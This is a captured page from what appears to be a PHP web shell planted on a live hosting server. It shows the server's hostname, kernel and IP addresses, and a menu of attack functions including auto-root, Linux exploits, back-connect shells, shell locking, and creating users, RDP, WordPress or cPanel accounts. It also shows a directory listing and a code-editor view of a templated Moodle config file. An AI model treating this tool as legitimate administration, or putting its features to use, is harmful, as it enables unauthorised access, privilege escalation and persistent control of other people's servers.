Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.223.159.143
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
moodle41 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
NOTES.txt
2.22
KB
-rw-r--r--
add_admin.php
733
B
-rw-r--r--
check_utf8.php
6.99
KB
-rw-r--r--
clone.php
5.5
KB
-rw-r--r--
config.php
745
B
-rw-r--r--
edit.php
4.63
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
12.4
KB
-rw-r--r--
fileindex.php
959
B
-rw-r--r--
get_plugin_list.php
572
B
-rw-r--r--
import.php
6.64
KB
-rw-r--r--
info.xml
3.55
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
11.01
KB
-rw-r--r--
install.xml
3.24
KB
-rw-r--r--
md5
4.02
KB
-rw-r--r--
privatekey.php
975
B
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
upgrade.php
8.08
KB
-rw-r--r--
upgrade.xml
307
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php // Moodle configuration file unset($CFG); global $CFG; $CFG = new stdClass(); $CFG->dbtype = '[[dbtype]]'; $CFG->dblibrary = 'native'; $CFG->dbhost = '[[softdbhost]]'; $CFG->dbname = '[[softdb]]'; $CFG->dbuser = '[[softdbuser]]'; $CFG->dbpass = '[[softdbpass]]'; $CFG->prefix = '[[dbprefix]]'; $CFG->dboptions = array ( 'dbpersist' => 0, 'dbport' => '', 'dbsocket' => '', 'dbcollation' => '[[collate]]', ); $CFG->wwwroot = '[[punycode_softurl]]'; $CFG->dataroot = '[[softdatadir]]'; $CFG->admin = 'admin'; $CFG->directorypermissions = 0777; require_once(__DIR__ . '/lib/setup.php'); // There is no php closing tag in this file, // it is intentional because it prevents trailing whitespace problems!
Close